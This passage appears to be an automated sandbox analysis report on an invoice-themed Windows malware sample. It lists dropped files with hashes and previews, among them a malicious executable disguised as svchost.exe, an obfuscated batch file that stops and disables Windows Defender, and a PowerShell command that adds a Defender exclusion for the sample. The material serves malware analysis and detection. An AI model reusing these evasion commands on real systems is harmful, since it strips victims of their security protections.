Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.6.4.2.8.1.3.2.9.5.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.6.4.3.2.7.7.3.5.6.4.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.c.5.3.8.e.2.-.7.f.9.a.-.4.4.6.5.-.8.1.5.0.-.c.2.8.f.3.0.8.6.a.0.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.3.6.6.5.2.d.-.a.f.b.0.-.4.6.b.4.-.9.c.a.6.-.0.c.9.4.2.1.8.2.1.f.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.N.-.I.n.v.o.i.c.e.-.X.X.X.X.X.9.8.0.8.-.1.9.0.1.1.1.4.3.2.8.7.9.8.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.8.-.0.0.0.1.-.0.0.1.b.-.4.2.f.9.-.6.4.6.e.f.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.f.5.2.a.f.f.8.5.c.1.f.d.5.6.a.5.9.9.2.9.b.1.a.2.7.2.2.2.a.6.0.0.0.0.0.9.0.4.!.0.0.0.0.e.3.0.5.6.5.d.f.7.c.0.5.9.7.a.7.6.8.5.7.5.3.2.e.4.c.a.7.d.f.6.d.2.7.2.8.e.7.b.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5540.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8494
Entropy (8bit):	3.7062826187294062
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNibKF6i6YraSUqi4jmgmfZyvSH+prW89b/Ssf0g1m:RrlsNibA6i6Y2SUqi4CgmfSSM/Rfi
MD5:	AAD18FACDDFA385A8F126A20DC205BA7
SHA1:	DB16EF44ED29E5A6FA892812BA11D0EF9B4F6E8A
SHA-256:	4EC0E8277B339DB4C21C0683D19FE716FE39C3904D2CBF9B62AD30A590E177CA
SHA-512:	E246569CECF1E4ACBDC314FABBEECC6B2157287BA03329DBBB04E1DBB710CA72D094A2C87D903358E1899CD4CF5612F1B4E417F2FDF47699016E41F52B8949C5
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER609C.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4800
Entropy (8bit):	4.56356179538913
Encrypted:	false
SSDEEP:	48:cvIwSD8zsDJgtWI9R9C1eWSC8BK8fm8M4JhyFFn+q8v4yqs4HZ6Cid:uITfdtBSNtJEKgfHZ6Cid
MD5:	6A4153505DFA6FE8B1EC36DEB7C8AA71
SHA1:	5E3422FDE7B0077F5CF56466FB8E833F34DBA089
SHA-256:	E538483481395B5E14006F3C1A949BA108A1F24211FD4274E0036E07B826F0E3
SHA-512:	A371C290E7DBF68DFB2174511D47E86AA20FD4BEBEC1EE13E95DBF2009B4EE064690CF94425FDEF1B324E5B88F8F4CA929571082174ADF13C60B4F04DB80D0EF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874062" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6107.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	61444
Entropy (8bit):	3.076881372976679
Encrypted:	false
SSDEEP:	1536:LyHdAdR34iR8Ah0+OQ1XPS4e6hUJtuE74a0z1Q:LyHdAdR34iR8Ah0+OQ1XPS4e6hUJtuEx
MD5:	370BE3D18A0268D960CF98E7E0AE1F0A
SHA1:	5FB9D2D61B85B432D94B3F7A8757B78924CA692B
SHA-256:	0088D6C317601D641E2D045FD69AAF4226F6D204AEE637750162AF8D2FB8F5B0
SHA-512:	3352E41B2AEC0518E837B4D159B1DC20731A94B2DA300A722353CA988A3F6C21D3F40F59B9E2298A5DFA2A434240D42233FF437950BBB7176FBE5D2BC26F400A
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER68D8.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.697492408748056
Encrypted:	false
SSDEEP:	96:9GiZYWzjEiaYsBYHuW/HFiYEZXEZt/icN3svwt08a5Pv1/ifhyIDA3:9jZD6NLE9la5P9qfhVDA3
MD5:	935C58D9D20FD50B5407E8B2C31913CC
SHA1:	8210182942CB357FD598591A387AA8AD4520C1A3
SHA-256:	F7E9C075396E99A941A536A010E15D3F749E0C17C88C7820276ADA73F912F316
SHA-512:	49A291618C0397B68C89FDE98525B7833BA577DEE2A73B033E9A6EB06B13A0465FE2FF0F20510B7CD35971F27F8CACC96BA6EC23F220FAEC98AF3C593FA063A1
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD8A.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Feb 23 14:31:40 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	328293
Entropy (8bit):	3.644711908429586
Encrypted:	false
SSDEEP:	3072:5kTr4m0Wpjd+put0upv5upv9gIOgF550FUCgUE2fO8dTqr1oy9y2J/:A4m0xpRuI9RpD5OTjHujT
MD5:	BFD998822CB747DD31588989BD0F29EA
SHA1:	158F46F3AD613F55AF153CC5F8CBA1D20A2B2F15
SHA-256:	9D9D63C8F547D97D3AA8086FB3881EACE5EE9D932BFCDEA746F7947B76485126
SHA-512:	DE4464744FF1914616AD587E925C468B2872433CEA1FD831311D7E7A9CD0D2FDFBA7F2332474106BE0F5ED5DFB4A12A379357CD7C9A06AB29DD3A784B94C4561
Malicious:	false
Preview:	MDMP....... .........5`...................U...........B......4-......GenuineIntelW...........T.......8.....5`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	634024
Entropy (8bit):	4.356962652008706
Encrypted:	false
SSDEEP:	6144:vLt3NCnZ05Bm8yB0VwxTLZR3yO7wVLTOY2QIDOvbqhUd5H/eIS/VNnUKEAwL:D1VVW0V2ybpTOYIUWfNpa
MD5:	E9CD061B2286D8098153C9D9E2ED0B4B
SHA1:	E30565DF7C0597A76857532E4CA7DF6D2728E7B5
SHA-256:	520FAE27134B14BB92D3858083C08496CEE8B1C7631F0A374C5E168ADFA799F2
SHA-512:	6D878D2A3B9A6172196416E8CCA9DC3BF0E73D0D8DA2D37E343938141CC2887EE0DF884F8B7CFB40F912D45C4B6A527313944DDE47ED7590F0FFA54E87C54122
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0................. ........@.. ..............................0.....@.....................................W.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4b..PI...........................................................".(......s.........s.........s.........s.........B.(.......(........0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...#.......(...+o,.......88.......(-...........(........(.................(/...o%..

C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	18114
Entropy (8bit):	5.004635661051711
Encrypted:	false
SSDEEP:	384:XHpib44EdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:XHUYV3IpNBQkj2Yh4iUxZvuiOOdBCNZt
MD5:	A0C8D9E005902D2613420FB7F31882AE
SHA1:	63B6F34FDE314DB3789AF6FBAE8DC88560DF5122
SHA-256:	A914A12BCDA0C56944E9B796E4989B5072867E1CB61D1C2240C8F60E69904D67
SHA-512:	069C98F6930730EC12A11435DA26F798426C9639AA69C58529773346C240494E8DF5A5CEB9D1D7380E324E9A113FFE215DA2D276478A60BB2BF5DB5B0D6196FA
Malicious:	false
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22300
Entropy (8bit):	5.601282691739982
Encrypted:	false
SSDEEP:	384:TtCD3C02NNRf0Ys/SBKnyTultIoHD7Y9gtcbeR21BMrmvZSRV7++IO9f64I+iq0:1NDfZU4KyTultpH3t0e9+ASs0
MD5:	90EF097F86AD22125BF947D518C7656A
SHA1:	B5CD1B6388C182CEDCB9F1A06BB85B9C63E93F06
SHA-256:	ADD7201ED52147675CB6C2F6264F8E9D2F64B3F5FBD66CE22E489AD743426ABE
SHA-512:	6677095B226C5FEF65A51DBCBFBCDFBD80CA4F9C34FF9A81A51B9A70CC5DFDE557E2E8DB3EFD5796A63485F79E22C7118576B9EBF5745F50FDF42EC6DE576207
Malicious:	false
Preview:	@...e...................................,............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91000
Entropy (8bit):	6.241345766746317
Encrypted:	false
SSDEEP:	1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5:	17FC12902F4769AF3A9271EB4E2DACCE
SHA1:	9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256:	29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512:	036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse Filename: New Order.exe, Detection: malicious, Browse Filename: PO#87498746510.exe, Detection: malicious, Browse Filename: TT.exe, Detection: malicious, Browse Filename: TT.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse Filename: Download_quotation_PR #371073.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse Filename: PurchaseOrdersCSTtyres004786587.exe, Detection: malicious, Browse Filename: 3zKVfxhs18.exe, Detection: malicious, Browse Filename: AWB783079370872.docm, Detection: malicious, Browse Filename: DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse Filename: Payment Advice 170221.exe, Detection: malicious, Browse Filename: Payment Receipt.jar, Detection: malicious, Browse Filename: miner.exe, Detection: malicious, Browse Filename: 875666665.xlsm.xlsm, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....).....)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	8399
Entropy (8bit):	4.665734428420432
Encrypted:	false
SSDEEP:	192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5:	B2A5EF7D334BDF866113C6F4F9036AAE
SHA1:	F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256:	27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512:	8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious:	false
Preview:	@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpz2dk3x.2yu.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkbamsn2.eco.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqb3zhdy.zix.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2jt1302.10x.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:in:i
MD5:	749B0BD3C8124E098A08AA0ECA590D7B
SHA1:	731F24480C1E9739638958D9B7FB1E55653C94E6
SHA-256:	692D9951E42E736CC5E1018E5ADBC09D1041CA9D38270CBDEC5DD6B1C36E138F
SHA-512:	131BB75FCCC6B6B3646D94086DCD3A3A90229B1757C00C9C1FB13C1B34C711BD8468E43099A179A7151741D7EEA5EECDD020351E7E6CD6EEDF2480367E06D392
Malicious:	true
Preview:	.....H

C:\Users\user\Documents\20210223\PowerShell_transcript.813848.L3gX1bPt.20210223153056.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	894
Entropy (8bit):	5.373377164598564
Encrypted:	false
SSDEEP:	24:BxSAm7vBZqx2DOXUWeSuau1tiWWHjeTKKjX4CIym1ZJXkVuau1t2:BZMvjqoO+SqWqDYB1ZSL
MD5:	A1AC553DA0F50C3DE5B07F4F4C85DF87
SHA1:	C358B1D38F5424BFB903D39006695710DA4645D8
SHA-256:	0461B9018620FD3162A60231D3F5DD85E6CFD3E53EBE1BAA435166027F9FBBD0
SHA-512:	95BD23978E364355ADA09FCDA2E59EF34F438760364AFDF2F8D2495B3399D2AD02D8AB1A1A2EF5AAC848BF65A7D99E94AA4F4C47F283E0591D3AA435F54641C4
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210223153139..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813848 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..Process ID: 6992..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210223153140..********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..

